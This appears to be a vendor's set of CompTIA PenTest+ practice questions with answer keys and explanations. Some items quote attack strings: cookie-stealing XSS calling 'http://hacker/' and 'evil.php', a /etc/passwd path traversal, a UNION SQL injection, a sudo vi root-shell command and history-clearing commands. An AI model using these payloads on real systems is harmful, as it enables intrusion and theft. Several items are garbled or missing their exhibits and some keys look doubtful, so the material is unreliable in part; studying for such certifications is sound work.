This PDF contains a set of carefully selected practice questions for the

PT0-002 exam. These questions are designed to reflect the structure,

difficulty, and topics covered in the actual exam, helping you reinforce
your understanding and identify areas for improvement.

What's Inside:

1. Topic-focused questions based on the latest exam objectives

2. Accurate answer keys to support self-review
3. Designed to simulate the real test environment
4. Ideal for final review or daily practice

Important Note:

This material is for personal study purposes only. Please do not

redistribute or use for commercial purposes without permission.

For full access to the complete question bank and topic-wise explanations, visit:
CertQuestionsBank.com

Our YouTube: https://www.youtube.com/@CertQuestionsBank

FB page: https://www.facebook.com/certquestionsbank
Share some PT0-002 exam online questions below.
1.A penetration tester completed a vulnerability scan against a web server and identified a single but
severe vulnerability.
Which of the following is the BEST way to ensure this is a true positive?
A. Run another scanner to compare.
B. Perform a manual test on the server.
C. Check the results on the scanner.
D. Look for the vulnerability online.
Answer: B

2. Which of the following documents would be the most helpful in determining who is at fault for a
temporary outage that occurred during a penetration test?
A. Non-disclosure agreement
B. Business associate agreement
C. Assessment scope and methodologies
D. Executive summary
Answer: C
Explanation:
The assessment scope and methodologies document defines the objectives, boundaries, rules of
engagement, and expected outcomes of a penetration testing engagement. It also specifies the roles
and responsibilities of the testers and the clients, as well as the communication channels and
escalation procedures. This document can help determine who is at fault for a temporary outage that
occurred during a penetration test, as it can clarify whether the outage was within the agreed scope
and methodologies, or whether it was caused by a violation of the rules of engagement or a lack of
coordination.
Reference:
• CompTIA PenTest+ Certification Exam Objectives, Domain 1.0 Planning and Scoping, Objective
1.1: Given a scenario, explain the importance of scoping an engagement properly.
• The Official CompTIA PenTest+ Instructor and Student Guides (PT0-002), Lesson 1: Planning and
Scoping Penetration Tests, Topic 1.1: Introduction to Penetration Testing Concepts, Topic 1.2: The
Penetration Testing Process, Topic 1.3: Planning and Scoping Penetration Tests.

3.During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:
A. SOW.
B. SLA.
C. ROE.
D. NDA
Answer: C
Explanation:
https://mainnerve.com/what-are-rules-of-engagement-in-pen-testing/#:~:text=The ROE includes the
dates,limits%2C or out of scope.

4.A red-team tester has been contracted to emulate the threat posed by a malicious insider on a
company’s network, with the constrained objective of gaining access to sensitive personnel files.
During the assessment, the red-team tester identifies an artifact indicating possible prior compromise
within the target environment.
Which of the following actions should the tester take?
A. Perform forensic analysis to isolate the means of compromise and determine attribution.
B. Incorporate the newly identified method of compromise into the red team’s approach.
C. Create a detailed document of findings before continuing with the assessment.
D. Halt the assessment and follow the reporting procedures as outlined in the contract.
Answer: D

5.10.1.0/24

6. SQLi error - paramtrized queries

7.A penetration tester completed an assessment, removed all artifacts and accounts created during
the test, and presented the findings to the client.
Which of the following happens NEXT?
A. The penetration tester conducts a retest.
B. The penetration tester deletes all scripts from the client machines.
C. The client applies patches to the systems.
D. The client clears system logs generated during the test.
Answer: C

8. During an assessment, a penetration tester obtains a list of password digests using Responder.
Which of the following tools would the penetration tester most likely use next?
A. Hashcat
B. Hydra
C. CeWL
D. Medusa
Answer: A
Explanation:
When a penetration tester obtains a list of password digests using Responder, the next logical step is
to attempt to crack these password hashes to retrieve the plaintext passwords. Hashcat is one of the
most widely used tools for this purpose. It is a high-performance password recovery tool that supports
a wide range of hashing algorithms and can utilize the power of GPU acceleration to significantly
speed up the cracking process.
Hashcat is preferred over tools like Hydra, CeWL, and Medusa in this context because it is
specifically designed for cracking password hashes rather than brute-forcing login credentials (Hydra,
Medusa) or generating custom wordlists (CeWL).
Reference: Hashcat official website: Hashcat
Usage examples in various penetration testing reports, including those involving password cracking
and hash manipulation.

9. After obtaining a reverse shell connection, a penetration tester runs the following command: www-
data@server! 2: sudo -1
User www-data may run the following commands on serverl2: (root) NOPASSWD: /usr/bin/vi
Which of the following is the fastest way to escalate privileges on this server?
A. Editing the file /etc/passwd to add a new user with uid 0
B. Creating a Bash script, saving it on the /tmp folder, and then running it
C. Executing the command sudo vi -c ' Jbash'
D. Editing the file/etc/sudoers to allow any command
Answer: C
Explanation:
When the penetration tester has NOPASSWD privileges to run vi as root, the quickest way to
escalate privileges is to leverage vi to execute a shell. The command sudo vi -c ':!bash' opens vi as
the root user and immediately spawns a shell within vi. This method is fast and effective because vi
(or vim) has the capability to run shell commands.
Executing sudo vi -c ':!bash' will open vi and then immediately run the :!bash command, which
spawns a Bash shell with root privileges.
Reference: GTFOBins - vi
Example from penetration testing reports where vi is used to escalate privileges: Writeup.

10.A penetration tester who is performing an engagement notices a specific host is vulnerable to
EternalBlue.
Which of the following would BEST protect against this vulnerability?
A. Network segmentation
B. Key rotation
C. Encrypted passwords
D. Patch management
Answer: D
Explanation:
Patch management is the process of identifying, downloading, and installing security patches for a
system in order to address new vulnerabilities and software exploits. In the case of EternalBlue, the
vulnerability was addressed by Microsoft in the form of a security patch. Installing this patch on the
vulnerable host will provide protection from the vulnerability. Additionally, organizations should
implement a patch management program to regularly check for and install security patches for the
systems in their environment.
Network segmentation (A) can limit the impact of a compromise by separating different parts of the
network into smaller, more isolated segments. However, it does not address the vulnerability itself.
Key rotation (B) is the process of periodically changing cryptographic keys, which can help protect
against attacks that rely on stolen or compromised keys. However, it is not directly related to the
EternalBlue vulnerability.
Encrypted passwords (C) can help protect user credentials in case of a data breach or other
compromise, but it does not prevent attackers from exploiting the EternalBlue vulnerability.
Reference: CompTIA PenTest+ Certification Guide, Chapter 1: Pre-engagement Interactions, Page
21.

11.The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?
A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22
handle heartbeat extension packets, allowing attackers to obtain sensitive information from process
memory.
B. This device is most likely a gateway with in-band management services.
C. This device is most likely a proxy server forwarding requests over TCP/443.
D. This device may be vulnerable to remote code execution because of a butter overflow vulnerability
in the method used to extract DNS names from packets prior to DNSSEC validation.
Answer: B
Explanation:
The heart bleed bug is an open ssl bug which does not affect SSH Ref:
https://www.sos-berlin.com/en/news-heartbleed-bug-does-not-affect-jobscheduler-or-ssh

12.Which of the following tools would BEST allow a penetration tester to capture wireless handshakes
to reveal a Wi-Fi password from a Windows machine?
A. Wireshark
B. EAPHammer
C. Kismet
D. Aircrack-ng
Answer: D
Explanation:
The BEST tool to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine
is Aircrack-ng. Aircrack-ng is a suite of tools used to assess the security of wireless networks. It starts
by capturing wireless network packets [1], then attempts to crack the network password by analyzing
them [1]. Aircrack-ng supports FMS, PTW, and other attack types, and can also be used to generate
keystreams for WEP and WPA-PSK encryption. It is capable of running on Windows, Linux, and Mac
OS X.
The BEST tool to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine
is Aircrack-ng. Aircrack-ng is a suite of tools used to assess the security of wireless networks. It starts
by capturing wireless network packets [1], then attempts to crack the network password by analyzing
them [1]. Aircrack-ng supports FMS, PTW, and other attack types, and can also be used to generate
keystreams for WEP and WPA-PSK encryption. It is capable of running on Windows, Linux, and Mac
OS X.

13.A penetration tester recently performed a social-engineering attack in which the tester found an
employee of the target company at a local coffee shop and over time built a relationship with the
employee. On the employee’s birthday, the tester gave the employee an external hard drive as a gift.
Which of the following social-engineering attacks was the tester utilizing?
A. Phishing
B. Tailgating
C. Baiting
D. Shoulder surfing
Answer: C
Explanation:
Reference: https://phoenixnap.com/blog/what-is-social-engineering-types-of-threats

14.A software development team is concerned that a new product's 64-bit Windows binaries can be
deconstructed to the underlying code.
Which of the following tools can a penetration tester utilize to help the team gauge what an attacker
might see in the binaries?
A. Immunity Debugger
B. OllyDbg
C. GDB
D. Drozer
Answer: A
Explanation:
Immunity Debugger is a powerful tool used for reverse engineering and debugging software. It is
especially suited for analyzing how malicious code works and could certainly be used to inspect a
64-bit Windows binary. It is used to find vulnerabilities in the code and would be a good choice for
understanding what an attacker might see in the binaries.
It's worth noting that OllyDbg is also a popular tool for this purpose, but it has less support for 64-bit
binaries compared to other tools like Immunity Debugger. GDB (GNU Debugger) is more frequently
used in Linux environments. Drozer is a tool used specifically for Android security assessments.

15.During a penetration tester found a web component with no authentication requirements.

The web component also allows file uploads and is hosted on one of the target public web the
following actions should the penetration tester perform next?
A. Continue the assessment and mark the finding as critical.
B. Attempting to remediate the issue temporally.
C. Notify the primary contact immediately.
D. Shutting down the web server until the assessment is finished
Answer: C
Explanation:
The penetration tester should notify the primary contact immediately, as this is a serious security
issue that may compromise the confidentiality, integrity, and availability of the web server and its data.
A web component with no authentication requirements and file upload capabilities can allow an
attacker to upload malicious files, such as web shells, backdoors, or malware, to the web server and
gain remote access or execute arbitrary commands on the web server. This can lead to further
attacks, such as data theft, data corruption, privilege escalation, lateral movement, or denial of
service. The penetration tester should inform the primary contact of the issue and its potential impact,
and provide recommendations for remediation, such as implementing authentication mechanisms,
restricting file upload types and sizes, or scanning uploaded files for malware. The other options are
not appropriate actions for the penetration tester at this stage. Continuing the assessment and
marking the finding as critical would delay the notification and remediation of the issue, which may
increase the risk of exploitation by other attackers. Attempting to remediate the issue temporarily
would interfere with the normal operation of the web server and may cause unintended consequences
or damage. Shutting down the web server until the assessment is finished would disrupt the
availability of the web server and its services, and may violate the scope or agreement of the
assessment.

16. A penetration tester is performing an assessment for an application that is used by large
organizations operating in the heavily regulated financial services industry. The penetration tester
observes that the default Admin User account is enabled and appears to be used several times a day
by unfamiliar IP addresses.
Which of the following is the most appropriate way to remediate this issue?
A. Increase password complexity.
B. Implement system hardening.
C. Restrict simultaneous user log-ins.
D. Require local network access.
Answer: B
Explanation:
System hardening is a comprehensive approach to securing systems and applications that includes a
variety of measures like disabling unnecessary accounts (such as default admin accounts), enforcing
the use of strong passwords, updating and patching systems, restricting network access, and
implementing proper authentication and authorization controls. Given the high-stakes environment of
the financial services industry, a robust system hardening process is essential to prevent
unauthorized access, particularly for an account that has default privileges and is being accessed by
unfamiliar IP addresses.

17.137.1.0/24

18.An Nmap scan shows open ports on web servers and databases. A penetration tester decides to
run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.
Which of the following is the penetration tester trying to accomplish?
A. Uncover potential criminal activity based on the evidence gathered.
B. Identify all the vulnerabilities in the environment.
C. Limit invasiveness based on scope.
D. Maintain confidentiality of the findings.
Answer: C

19.A company that requires minimal disruption to its daily activities needs a penetration tester to
perform information gathering around the company’s web presence.
Which of the following would the tester find MOST helpful in the initial information-gathering steps?
(Choose two.)
A. IP addresses and subdomains
B. Zone transfers
C. DNS forward and reverse lookups
D. Internet search engines
E. Externally facing open ports
F. Shodan results
Answer: A,D

20.A penetration tester ran the following commands on a Windows server:

Which of the following should the tester do AFTER delivering the final report?
A. Delete the scheduled batch job.
B. Close the reverse shell connection.
C. Downgrade the svsaccount permissions.
D. Remove the tester-created credentials.
Answer: D
21.A penetration tester gains access to a system and establishes persistence, and then runs the
following commands:
cat /dev/null > temp
touch Cr .bash_history temp
mv temp .bash_history
Which of the following actions is the tester MOST likely performing?
A. Redirecting Bash history to /dev/null
B. Making a copy of the user's Bash history for further enumeration
C. Covering tracks by clearing the Bash history
D. Making decoy files on the system to confuse incident responders
Answer: C
Explanation:
Reference: https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-
cover- your-tracks-remain-undetected-0244768/

22. A penetration tester is conducting a test after hours and notices a critical system was taken down.
Which of the following contacts should be notified first?
A. Secondary
B. Emergency
C. Technical
D. Primary
Answer: D
Explanation:
In the context of penetration testing, the primary contact is typically the first point of contact
established before the penetration test begins. This person is usually a stakeholder or an individual
who has the authority and responsibility over the system being tested. In the scenario where a critical
system is taken down during off-hours, the primary contact should be notified first to ensure a prompt
and coordinated response. The primary contact can then decide on the next steps, including
escalating the issue to technical, secondary, or emergency contacts if necessary. This approach
maintains the chain of command and ensures that the appropriate parties are informed in a structured
manner.

23.A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating
proprietary company information. The administrator offers to pay the tester to keep quiet.
Which of the following is the BEST action for the tester to take?
A. Check the scoping document to determine if exfiltration is within scope.
B. Stop the penetration test.
C. Escalate the issue.
D. Include the discovery and interaction in the daily report.
Answer: C
Explanation:
In a situation where illegal or unethical activity is discovered during an assessment, the appropriate
course of action is to escalate the issue to the appropriate parties in the organization, such as
management, or the person or team who hired the penetration tester. This ensures that those
responsible for the organization's security and compliance are aware of the situation and can take
appropriate action.
A) Checking the scoping document won't help in this situation. While the scoping document defines
the boundaries for the penetration test, the discovery of illegal activity is outside the realm of a typical
penetration test and needs to be handled differently.
B) Stopping the penetration test might not be necessary and doesn't address the issue at hand, which
is the discovered illicit activity and bribe attempt.
D) While including the discovery and interaction in the daily report is important, it is not sufficient. A
situation as serious as this warrants immediate escalation.

24.The following PowerShell snippet was extracted from a log of an attacker machine:

A penetration tester would like to identify the presence of an array.

Which of the following line numbers would define the array?
A. Line 8
B. Line 13
C. Line 19
D. Line 20
Answer: A
Explanation:
https://learn.microsoft.com/en-
us/powershell/module/microsoft.powershell.core/about/about_arrays?view=powershell-7.3

25. A penetration tester executes the following Nmap command and obtains the following output:

Which of the following commands would best help the penetration tester discover an exploitable
service?
A. nmap -v -p 25 -- soript smtp-enum-users remotehost
B. nmap -v -- script=mysql-info.nse remotehost
C. nmap --ocript=omb-brute.noe remotehoat
D. nmap -p 3306 -- script "http*vuln*" remotehost
Answer: B
Explanation:
The Nmap command in the question scans all ports on the remote host and identifies the services
and versions running on them. The output shows that port 3306 is open and running MariaDB, which
is a fork of MySQL. Therefore, the best command to discover an exploitable service would be to use
the mysql-info.nse script, which gathers information about the MySQL server, such as the version,
user accounts, databases, and configuration variables. The other commands are either misspelled,
irrelevant, or too broad for the task.
Reference: Best PenTest+ certification study resources and training materials, CompTIA PenTest+
PT0-002 Cert Guide, 101 Labs ? CompTIA PenTest+: Hands-on Labs for the PT0-002 Exam

26. Which of the following elements of a penetration testing report aims to provide a normalized and
standardized representation of discovered vulnerabilities and the overall threat they present to an
affected system or network?
A. Executive summary
B. Vulnerability severity rating
C. Recommendations of mitigation
D. Methodology
Answer: B
Explanation:
The vulnerability severity rating element of a penetration testing report provides a normalized and
standardized representation of discovered vulnerabilities and their threat levels. It typically involves
assigning a numerical or categorical score (such as low, medium, high, critical) to each vulnerability
based on factors like exploitability, impact, and the context in which the vulnerability exists. This helps
in prioritizing the vulnerabilities for remediation and provides a clear understanding of the risk they
pose to the system or network.

27.An executive needs to use Wi-Fi to connect to the company's server while traveling. While looking
for available Wi-Fi connections, the executive notices an available access point to a hotel chain that is
not available where the executive is staying.
Which of the following attacks is the executive most likely experiencing?
A. Data modification
B. Amplification
C. Captive portal
D. Evil twin
Answer: D
Explanation:
The attacker creates an access point with the same name and network settings as a legitimate
access point, but with a stronger signal to attract users. Once a victim connects to the rogue access
point, the attacker can intercept and steal any data transmitted over the connection, including login
credentials, credit card information, and other sensitive data.

28.During a web application test, a penetration tester was able to navigate to https://company.com
and view all links on the web page. After manually reviewing the pages, the tester used a web
scanner to automate the search for vulnerabilities. When returning to the web application, the
following message appeared in the browser: unauthorized to view this page.
Which of the following BEST explains what occurred?
A. The SSL certificates were invalid.
B. The tester IP was blocked.
C. The scanner crashed the system.
D. The web page was not found.
Answer: B

29.Given the following code:

<SCRIPT>var+img=new+Image();img.src=”http://hacker/ + document.cookie;</SC
RIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
A. Web-application firewall
B. Parameterized queries
C. Output encoding
D. Session tokens
E. Input validation
F. Base64 encoding
Answer: C,E
Explanation:
Encoding (commonly called “Output Encoding”) involves translating special characters into some
different but equivalent form that is no longer dangerous in the target interpreter, for example
translating the < character into the &lt; string when writing to an HTML page.
30.A security analyst needs to perform a scan for SMB port 445 over a/16 network.
Which of the following commands would be the BEST option when stealth is not a concern and the
task is time sensitive?
A. Nmap -s 445 -Pn -T5 172.21.0.0/16
B. Nmap -p 445 -n -T4 -open 172.21.0.0/16
C. Nmap -sV --script=smb* 172.21.0.0/16
D. Nmap -p 445 -max -sT 172. 21.0.0/16
Answer: B
Explanation:
Nmap is a powerful network scanning tool used for network discovery and security auditing. The
options used in this command perform the following functions:
-p 445: This tells nmap to only scan for TCP port 445 (SMB).
-n: This tells nmap to skip DNS resolution, saving time.
-T4: This sets the timing template to "aggressive". This speeds up the scan, but makes it less
stealthy, which isn't a concern here.
-open: This tells nmap to only show open ports in the results, making the output easier to read and
understand.

31.Which of the following situations would require a penetration test er to notify the emergency
contact for the engagement?
A. The team exploits a critical server within the organization.
B. The team exfiltrates PII or credit card data from the organization.
C. The team loses access to the network remotely.
D. The team discovers another actor on a system on the network.
Answer: D

32.A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a
shell. However, a connection was not established, and no errors were shown on the payload
execution. The penetration tester suspected that a network device, like an IPS or next-generation
firewall, was dropping the connection.
Which of the following payloads are MOST likely to establish a shell successfully?
A. windows/x64/meterpreter/reverse_tcp
B. windows/x64/meterpreter/reverse_http
C. windows/x64/shell_reverse_tcp
D. windows/x64/powershell_reverse_tcp
E. windows/x64/meterpreter/reverse_https
Answer: E
Explanation:
Payloads that use HTTP(S) are more likely to successfully bypass a network device like an Intrusion
Prevention System (IPS) or Next-Generation Firewall (NGFW). This is because HTTP(S) is a
common traffic type that is allowed on most networks. HTTPS specifically is encrypted, making it
difficult for an IPS or NGFW to analyze the content of the traffic and block it.
The Meterpreter payload has many features designed for evasion, and when used with HTTPS (in
this case, the "windows/x64/meterpreter/reverse_https" payload), it has a better chance of bypassing
network security controls and establishing a connection back to the penetration tester.
A) windows/x64/meterpreter/reverse_tcp, C) windows/x64/shell_reverse_tcp, and D)
windows/x64/powershell_reverse_tcp all use TCP without encryption or any particular evasion
techniques, which makes them more likely to be caught by an IPS or NGFW.
B) windows/x64/meterpreter/reverse_http does use HTTP, which can help with evasion, but HTTP
traffic can be inspected by IPS and NGFW devices, especially if they are configured for deep packet
inspection. HTTPS traffic, on the other hand, is encrypted and therefore harder for these devices to
analyze.

33.A company becomes concerned when the security alarms are triggered during a penetration test.
Which of the following should the company do NEXT?
A. Halt the penetration test.
B. Contact law enforcement.
C. Deconflict with the penetration tester.
D. Assume the alert is from the penetration test.
Answer: C

34. Which of the following is a ROE component that provides a penetration tester with guidance on
who and how to contact the necessary individuals in the event of a disaster during an engagement?
A. Engagement scope
B. Communication escalation path
C. SLA
D. SOW
Answer: B
Explanation:
The communication escalation path is a component of the Rules of Engagement (ROE) that provides
a penetration tester with guidance on whom to contact and how to proceed in the event of an
emergency or disaster during an engagement. This includes contact information for key individuals
and predefined procedures to follow to ensure that any issues are addressed promptly and
appropriately.
The engagement scope defines the boundaries and objectives of the test, the SLA (Service Level
Agreement) outlines performance and uptime requirements, and the SOW (Statement of Work)
details the tasks and deliverables. However, the communication escalation path specifically
addresses communication protocols during emergencies.
Reference: Explanation of Rules of Engagement components: OWASP Testing Guide
Examples from penetration testing engagements highlighting the importance of communication plans:
Anubis.

35.A potential reason for communicating with the client point of contact during a penetration test is to
provide resolution if a testing component crashes a system or service and leaves them unavailable for
both legitimate users and further testing.
Which of the following best describes this concept?
A. Retesting
B. De-escalation
C. Remediation
D. Collision detection
Answer: C
Explanation:
Communicating with the client point of contact during a penetration test, especially when a testing
component crashes a system or service, is crucial for remediation. Remediation involves the process
of correcting or mitigating vulnerabilities that have been identified during the test. In the context of a
system or service becoming unavailable, it's essential to promptly address and resolve the issue to
restore availability and ensure the continuity of legitimate business operations. This communication
ensures that the client is aware of the incident and can work together with the penetration tester to
implement corrective actions, thereby minimizing the impact on the business and further testing
activities.
36.A penetration tester needs to access a building that is guarded by locked gates, a security team,
and cameras.
Which of the following is a technique the tester can use to gain access to the IT framework without
being detected?
A. Pick a lock.
B. Disable the cameras remotely.
C. Impersonate a package delivery worker.
D. Send a phishing email.
Answer: C

37. Given the following Nmap scan command:

[root@kali ~]# nmap 192.168.0 .* -- exclude 192.168.0.101
Which of the following is the total number of servers that Nmap will attempt to scan?
A. 1
B. 101
C. 255
D. 256
Answer: C
Explanation:
The Nmap scan command given will scan all the hosts in the 192.168.0.0/24 subnet, except for the
one with the IP address 192.168.0.101. The subnet has 256 possible hosts, but one of them is
excluded, so the total number of servers that Nmap will attempt to scan is 255.
Reference: Nmap Commands - 17 Basic Commands for Linux Network, Section: Scan Multiple Hosts,
Subsection:
Excluding Hosts from Search
Nmap Cheat Sheet 2023: All the Commands and More, Section: Target Specification, Subsection: -
exclude

38.Which of the following would MOST likely be included in the final report of a static application-
security test that was written with a team of application developers as the intended audience?
A. Executive summary of the penetration-testing methods used
B. Bill of materials including supplies, subcontracts, and costs incurred during assessment
C. Quantitative impact assessments given a successful software compromise
D. Code context for instances of unsafe type-casting operations
Answer: D

39.A physical penetration tester needs to get inside an organization's office and collect sensitive
information without acting suspiciously or being noticed by the security guards. The tester has
observed that the company's ticket gate does not scan the badges, and employees leave their
badges on the table while going to the restroom.
Which of the following techniques can the tester use to gain physical access to the office? (Choose
two.)
A. Shoulder surfing
B. Call spoofing
C. Badge stealing
D. Tailgating
E. Dumpster diving
F. Email phishing
Answer: C,D

40.A penetration tester has gained access to part of an internal network and wants to exploit on a
different network segment.
Using Scapy, the tester runs the following command:

Which of the following represents what the penetration tester is attempting to accomplish?
A. DNS cache poisoning
B. MAC spoofing
C. ARP poisoning
D. Double-tagging attack
Answer: D
Explanation:
https://scapy.readthedocs.io/en/latest/usage.html

41.During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a
network administrator that is broadcasting Bluetooth frames.
Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?
A. Sniff and then crack the WPS PIN on an associated WiFi device.
B. Dump the user address book on the device.
C. Break a connection between two Bluetooth devices.
D. Transmit text messages to the device.
Answer: B
Explanation:
Bluesnarfing is the unauthorized access of information from a wireless device through a Bluetooth
connection, often between phones, desktops, laptops, and PDAs. This allows access to calendars,
contact lists, emails and text messages, and on some phones, users can copy pictures and private
videos.

42.During a security assessment, a penetration tester decides to write the following Python script:
import requests
x= ['OPTIONS', 'TRACE', 'TEST'l
for y in x;
z - requests.request(y, 'http://server.net')
print(y, z.status_code, z.reason)
Which of the following is the penetration tester trying to accomplish? (Select two).
A. Web server denial of service
B. HTTP methods availability
C. 'Web application firewall detection
D. 'Web server fingerprinting
E. Web server error handling
F. Web server banner grabbing
Answer: B, E
Explanation:
HTTP methods availability - The script is testing which HTTP methods are supported by the server.
By sending requests using OPTIONS, TRACE, and a presumably custom or less commonly used
method (TEST), the tester can determine what methods the server will respond to and how it handles
different types of requests.
Web server error handling - By using non-standard or less commonly supported HTTP methods (like
TEST), the script checks how the server handles unexpected or invalid requests. This can reveal
information about the server's robustness and its error handling capabilities, which is crucial for
understanding potential vulnerabilities related to improper input handling.

43.A tester who is performing a penetration test on a website receives the following output:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in
/var/www/search.php on line 62
Which of the following commands can be used to further attack the website?
A. <script>var adr= ‘../evil.php?test=’ + escape(document.cookie);</script>
B. ../../../../../../../../../../etc/passwd
C. /var/www/html/index.php;whoami
D. 1 UNION SELECT 1, DATABASE(),3--
Answer: D

44.A penetration tester is assessing a wireless network. Although monitoring the correct channel and
SSID, the tester is unable to capture a handshake between the clients and the AP.
Which of the following attacks is the MOST effective to allow the penetration tester to capture a
handshake?
A. Key reinstallation
B. Deauthentication
C. Evil twin
D. Replay
Answer: B
Explanation:
Deauth will make the client connect again

45.A new security firm is onboarding its first client. The client only allowed testing over the weekend
and needed the results Monday morning. However, the assessment team was not able to access the
environment as expected until Monday.
Which of the following should the security company have acquired BEFORE the start of the
assessment?
A. A signed statement of work
B. The correct user accounts and associated passwords
C. The expected time frame of the assessment
D. The proper emergency contacts for the client
Answer: B

46.A penetration tester found the following valid URL while doing a manual assessment of a web
application: http://www.example.com/product.php?id=123987.
Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in
this URL?
A. SQLmap
B. Nessus
C. Nikto
D. DirBuster
Answer: A

47.A penetration tester logs in as a user in the cloud environment of a company.

Which of the following Pacu modules will enable the tester to determine the level of access of the
existing user?
A. iam_enum_permissions
B. iam_privesc_scan
C. iam_backdoor_assume_role
D. iam_bruteforce_permissions
Answer: A
Explanation:
Reference: https://essay.utwente.nl/76955/1/Szabo_MSc_EEMCS.pdf (37)

48.A security company has been contracted to perform a scoped insider-threat assessment to try to
gain access to the human resources server that houses PII and salary data. The penetration testers
have been given an internal network starting position.
Which of the following actions, if performed, would be ethical within the scope of the assessment?
A. Exploiting a configuration weakness in the SQL database
B. Intercepting outbound TLS traffic
C. Gaining access to hosts by injecting malware into the enterprise-wide update server
D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates
E. Establishing and maintaining persistence on the domain controller
Answer: A

49.During the scoping phase of an assessment, a client requested that any remote code exploits
discovered during testing would be reported immediately so the vulnerability could be fixed as soon
as possible. The penetration tester did not agree with this request, and after testing began, the tester
discovered a vulnerability and gained internal access to the system. Additionally, this scenario led to a
loss of confidential credit card data and a hole in the system. At the end of the test, the penetration
tester willfully failed to report this information and left the vulnerability in place. A few months later, the
client was breached and credit card data was stolen.
After being notified about the breach, which of the following steps should the company take NEXT?
A. Deny that the vulnerability existed
B. Investigate the penetration tester.
C. Accept that the client was right.
D. Fire the penetration tester.
Answer: B

50.A penetration tester has been provided with only the public domain name and must enumerate
additional information for the public-facing assets.

INSTRUCTIONS
Select the appropriate answer(s), given the output from each section.
Output 1
Answer:
51.CORRECT TEXT
SIMULATION
Using the output, identify potential attack vectors that should be further investigated.
Answer:
1: Null session enumeration Weak SMB file permissions Fragmentation attack
2: nmap
-sV
-p 1-1023

52.A penetration tester has been given eight business hours to gain access to a client’s financial
system.
Which of the following techniques will have the highest likelihood of success?
A. Attempting to tailgate an employee going into the client's workplace
B. Dropping a malicious USB key with the company’s logo in the parking lot
C. Using a brute-force attack against the external perimeter to gain a foothold
D. Performing spear phishing against employees by posing as senior management
Answer: D

53. A penetration tester observes an application enforcing strict access controls.

Which of the following would allow the tester to bypass these controls and successfully access the
organization's sensitive files?
A. Remote file inclusion
B. Cross-site scripting
C. SQL injection
D. Insecure direct object references
Answer: D
Explanation:
Insecure Direct Object Reference (IDOR) vulnerabilities when an application provides direct access to
objects based on user-supplied input. This can allow an attacker to bypass authorization and access
resources in the system directly, for example database records or files1. In this case, the penetration
tester could potentially bypass the strict access controls and access the organization’s sensitive files.
Reference: IDOR Vulnerability Overview

54.A mail service company has hired a penetration tester to conduct an enumeration of all user
accounts on an SMTP server to identify whether previous staff member accounts are still active.
Which of the following commands should be used to accomplish the goal?
A. VRFY and EXPN
B. VRFY and TURN
C. EXPN and TURN
D. RCPT TO and VRFY
Answer: A
Explanation:
Reference: https://hackerone.com/reports/193314

55.A penetration tester runs the unshadow command on a machine.

Which of the following tools will the tester most likely use NEXT?
A. John the Ripper
B. Hydra
C. Mimikatz
D. Cain and Abel
Answer: A
Explanation:
Reference: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
56.Which of the following documents describes activities that are prohibited during a scheduled
penetration test?
A. MSA
B. NDA
C. ROE
D. SLA
Answer: C
Explanation:
The document that describes activities that are prohibited during a scheduled penetration test is ROE,
which stands for rules of engagement. ROE is a document that defines the scope, objectives,
methods, limitations, and expectations of a penetration test. ROE can specify what activities are
allowed or prohibited during the penetration test, such as which targets, systems, networks, or
services can be tested or attacked, which tools, techniques, or exploits can be used or avoided, which
times or dates can be scheduled or excluded, or which impacts or risks can be accepted or mitigated.
ROE can help ensure that the penetration test is conducted in a legal, ethical, and professional
manner, and that it does not cause any harm or damage to the client or third parties. The other
options are not documents that describe activities that are prohibited during a scheduled penetration
test. MSA stands for master service agreement, which is a document that defines the general terms
and conditions of a contractual relationship between two parties, such as the scope of work, payment
terms, warranties, liabilities, or dispute resolution. NDA stands for non-disclosure agreement, which is
a document that defines the confidential information that is shared between two parties during a
business relationship, such as trade secrets, intellectual property, or customer data. SLA stands for
service level agreement, which is a document that defines the quality and performance standards of a
service provided by one party to another party, such as availability, reliability, responsiveness, or
security.

57.A CentOS computer was exploited during a penetration test. During initial reconnaissance, the
penetration tester discovered that port 25 was open on an internal Sendmail server.
To remain stealthy, the tester ran the following command from the attack machine:

Which of the following would be the BEST command to use for further progress into the targeted
network?
A. nc 10.10.1.2
B. ssh 10.10.1.2
C. nc 127.0.0.1 5555
D. ssh 127.0.0.1 5555
Answer: C

58.Which of the following should a penetration tester attack to gain control of the state in the HTTP
protocol after the user is logged in?
A. HTTPS communication
B. Public and private keys
C. Password encryption
D. Sessions and cookies
Answer: D
59.A penetration tester wants to find hidden information in documents available on the web at a
particular domain.
Which of the following should the penetration tester use?
A. Netcraft
B. CentralOps
C. Responder
D. FOCA
Answer: D
Explanation:
https://kalilinuxtutorials.com/foca-metadata-hidden-documents/

60.A penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information being
transmitted?
A. Decode the authorization header using UTF-8.
B. Decrypt the authorization header using bcrypt.
C. Decode the authorization header using Base64.
D. Decrypt the authorization header using AES.
Answer: C

61.A software company has hired a penetration tester to perform a penetration test on a database
server. The tester has been given a variety of tools used by the company’s privacy policy.
Which of th e following would be the BEST to use to find vul nerabilities on this server?
A. OpenVAS
B. Nikto
C. SQLmap
D. Nessus
Answer: C
Explanation:
Reference: https://phoenixnap.com/blog/best-penetration-testing-tools

62.Penetration-testing activities have concluded, and the initial findings have been reviewed with the
client.
Which of the following best describes the NEXT step in the engagement?
A. Acceptance by the client and sign-off on the final report
B. Scheduling of follow-up actions and retesting
C. Attestation of findings and delivery of the report
D. Review of the lessons learned during the engagement
Answer: C

63.A penetration tester was able to compromise a server and escalate privileges.
Which of the following should the tester perform AFTER concluding the activities on the specified
target? (Choose two.)
A. Remove the logs from the server.
B. Restore the server backup.
C. Disable the running services.
D. Remove any tools or scripts that were installed.
E. Delete any created credentials.
F. Reboot the target server.
